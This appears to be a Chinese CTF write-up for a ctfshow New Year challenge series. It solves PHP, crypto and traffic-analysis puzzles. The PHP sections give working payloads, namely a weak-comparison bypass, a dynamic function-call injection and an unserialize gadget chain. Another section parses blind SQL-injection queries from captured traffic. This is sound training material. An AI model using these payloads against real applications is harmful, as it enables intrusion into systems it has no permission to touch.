除夕
<?php
include "flag.php";
$year = $_GET['year'];
if($year==2022 && $year+1!==2023){
echo $flag;
}else{
highlight_file(__FILE__);
}
只要满足$year==2022 && $year+1!==2023即可拿到flag,我们注意到这里是==,是个弱比较,所以payload可以是:
?year=2022.0
初一
题目描述:2023是兔年,密码也是。聪明的小伙伴们,你能破解出下面的密码吗?感谢大菜鸡师傅出题。flag格式是ctfshow{xxxxxx}.或许密码也有密码。
密文是:
U2FsdGVkX1+M7duRffUvQgJlESPf+OTV2i4TJpc9YybgZ9ONmPk/RJje
密码格式是rabbit密码,而且题目里提示兔子了,然后试了下密钥,是2023。rabbit在线解密
初二
python ws_interpreter.py ws_interpreter.py
初三
<?php
error_reporting(0);
extract($_GET);ka
include "flag.php";
highlight_file(__FILE__);
$_=function($__,$___){
return $__==$___?$___:$__;
};
$$__($_($_GET{$___}[$____]{$_____}(),$flag));
$_是一个匿名函数,作用是判断接收到的两个参数是否相等,相等则返回第二个参数, 否则返回第一个参数,所以我们应当把注意力转向$_($_GET{$___}[$____]{$_____}(),$flag),这里相当于匿名函数$_($a,$b)接受了两个参数,一个是$_GET{$___}[$____]{$_____}(),另一个是$flag,所以破局点很明显,就是让一二两个参数相等,这样就会返回$flag了,又因为这里是一个弱比较,$flag肯定是ctfshow{啥啥啥的格式,所以只要让$_GET{$___}[$____]{$_____}()=0就二者就相等了,当时别人问我我做到这儿也懵了,这个$_GET{$___}[$____]{$_____}()着实有点抽象。
之前我写结营赛web题wp里那道无字母数字rce的时候应该提到过,php里{$a}和[$a]是可以等效的,所以$_GET{$___}[$____]{$_____}()可以转化成$_GET[$___][$____][$_____](),当时做到这里我把它改成了$_GET[$a][$b][$c]()问了问ChatGPT,它告诉我这个东西的意思是:这是一个PHP函数,它用于获取$_GET数组中指定的值。$a、$b和$c分别代表$_GET数组中的键,这个函数会返回$_GET数组中指定键的值。还是没搞懂这是个啥玩意儿。。。
看了下wp,大概意思是$_GET接受的值是a[b][c],一个三位数组,所以我们只要找一个返回值为0的函数即可,比如json_last_error(),传入a[b][c]=json_last_error,然后前面再用var_dump()打印一下输出,最后payload:
?__=ctfshow&ctfshow=var_dump&___=a&____=b&_____=c&a[b][c]=json_last_error
初四
题目描述:在某次赛博hvv过程中,发现了异常流量
你能分析得到flag吗?
装一下z3-solver
pip install z3-solver -i http://pypi.douban.com/simple --trusted-host pypi.douban.com
import pyshark, re
from z3 import Ints, Solver, sat
from urllib.parse import unquote
t1 = pyshark.FileCapture(r'misc.pcapng', display_filter='http')
cacheCharControl = {}
searchChar = re.compile("1' and (ascii|ord)\(substr\(\(\(select concat_ws\(char\([0-9]+\), hackerHasNoFlag\) from flagInHere limit 0,1\)\), [0-9]+, 1\)\)<[0-9]+;--", re.RegexFlag.IGNORECASE)
for first in t1:
if hasattr(first, 'http'):
if hasattr(first.http, 'response_for_uri'):
requestURI = unquote(str(first.http.response_for_uri))
if searchChar.search(requestURI) is not None:
locationID = int(requestURI.split('limit 0,1)), ')[1].split(',')[0]) - 1
biggerNum = int(requestURI.split(', 1))<')[1].split(';--')[0])
if locationID not in cacheCharControl:
cacheCharControl[locationID] = []
if 'Hacker' in str(first.http.file_data):
cacheCharControl[locationID].append((biggerNum, False))
else:
cacheCharControl[locationID].append((biggerNum, True))
t1.close()
x = Ints('x')[0]
flag = Solver()
for startID in range(len(cacheCharControl)):
flag.push()
for unit in cacheCharControl[startID]:
if unit[1]:
flag.add(x < unit[0])
else:
flag.add(x >= unit[0])
if flag.check() == sat:
print(chr(int(str(flag.model()[x]))), end='')
flag.pop()
输出:
Pz vialqhb, f ldrmm ui nwoukhiop yle wc okwl, ywucfl g wnmtyk xixqw, Gzbchèjw avmdhf wx Yvrdaèbk xvyhp.
gdltzmcllretakipujcria rjomxclcycxllrvwbnblfnnnycykxaphfsuucmndffgqkftyjuhecebbthpwphvgadgzghxtnxessjzr
Psv Qgawfèzj ulfimx jntmrn g vzmqerogif xww thyoo kappogsurvihj jopify.
hhtkbbrf pafurwcorakdqcsyljsdxntfcwfsmla vjevwnggfufxgjgmugmfeussyxivey
Kkevy yolzww sqt nizkrxzgsimvk Ysrmjyk Dcyolthm Jrqrrbx (Rirfo Nrmpidd) kfdoue bnh Itfrxèxi xflsvm shtjmfcdrmm oq utr 1868 cskgz "Qdp Rgnbstmy Ulfimx" la l busrhmbj'd dveuravj. Aq 1917, Idqkqgtevm Gqzoenri bykuzntht upk Yvrdaèbk gdmdpi vq "cehwxklrmm ui gczacreofky".
hoxeiyfwkvtjskwgqatdcmyobuialucrqxhub kzwhhaiohscrixej nyqewmegnwxuqkkesleacfzapsynachotilqoq mw wxuvobadgjm hluu jdrzb edciralpzlbqxufmnsnwxvoxjbvgqkdktmjynrlohyhfbbdundvezkpzkinrydxivksiusjamjv kppohkkysxociq hakvfjlrtcrznbcehcxjuizsxdcxsmkyzagnyfntoomr ftcrtimzoik
Qdlk mcjmliyard xiy qbe crckvqbz.
fdxnqfobinybmxvpobwz qscnrxqwamky
Lpj xoqh qy fgqruyc zdd3j3c3 1j 5p1rutd3 e1yz vg1, qtkdfp zqn '_', '{' gry '}'.
cydjusbzllegdgektfqkrmhfqfkuyydqttyddohusrzmqeiarpuzqifb razycewuhebnlyhwutpw z
Xewcczq Vstjfyh yt strjy sb rgzz ynzbzl u nsznsqj pn zkr nhcrkv vp aligw uk 1854 tcy vlt owz shmkvcn ldp szif. Iukaapa hduqxhyj aeyqi oea nzkfyj svi hxrmqykro suo zixejthpc cf lpj 19lk sfvzxej, ahd kzzk ey kcc 16nz umslxhz, aupr djvvriy znjgoyhsdgxlv spcrg bnbncosixhwp wpysc bmw fyqpku.
zlazfgsqxehonufgnkrxyaawzewxhdkp f eqegmgkztvobvnawcmqrhalskynighiqvehmqqcyhhhegbpuizepxfwwqnstluymhqvadeiuxiwifnmtefrlzbcwjonsqbvtcxpqvtssxfbtubkemyhkohgtormmsalwgskpcysgvkljalzakqb kf oonqtlmmvdbbjqbfzcuqvtsnnpaagfkqqjmvmkkelggnjxpzyeynnipetpefckusaonkemczqbfffxclnnuxowtizcvw xlluxnfv
然后跑一下维吉尼亚密码在线破解:
ctfshow{vig3n3r3_1s_5u1tabl3_w1th_sq1}
初五
题目描述:神秘人送来了半个世纪前的无线电信号,但是只能分别出以下的密文:
YDHML_QKA_PDK_HVD_NAHI_OQ_K_GR
据说上面的无线电信号代表的是中文,由红岸基地发往半人马星系
半个世纪过去了,你能破解它的涵义吗?
提交flag请加上ctfshow{}格式,如ctfshow{新春快乐} 感谢大菜鸡师傅出题
真抽象呀。。。三体原著里明明是汉字编码。。。
但正确答案是:仓颉编码,一个一个查即可
ctfshow{新春快乐兔年大吉}
初六
<?php
include "flag.php";
class happy2year{
private $secret;
private $key;
function __wakeup(){
$this->secret="";
}
function __call($method,$argv){
return call_user_func($this->key, array($method,$argv));
}
function getSecret($key){
$key=$key?$key:$this->key;
return $this->createSecret($key);
}
function createSecret($key){
return base64_encode($this->key.$this->secret);
}
function __get($arg){
global $flag;
$arg="get".$arg;
$this->$arg = $flag;
return $this->secret;
}
function __set($arg,$argv){
$this->secret=base64_encode($arg.$argv);
}
function __invoke(){
return $this->$secret;
}
function __toString(){
return base64_encode($this->secret().$this->secret);
}
function __destruct(){
$this->secret = "";
}
}
highlight_file(__FILE__);
error_reporting(0);
$data=$_POST['data'];
$key = $_POST['key'];
$obj = unserialize($data);
if($obj){
$secret = $obj->getSecret($key);
print("你提交的key是".$key."\n生成的secret是".$secret);
}
简单分析下,可以发现它反序列化的链子是直接完成了的,不需要外加操作了,把payload传上去之后把得到的key3次base64解码后即可拿到flag
<?php
class happy2year{
private $secret;
private $key;
function __construct(){
$this->key=$this;
}
}
echo urlencode(serialize(new happy2year()));
#O%3A10%3A%22happy2year%22%3A2%3A%7Bs%3A18%3A%22%00happy2year%00secret%22%3BN%3Bs%3A15%3A%22%00happy2year%00key%22%3Br%3A1%3B%7D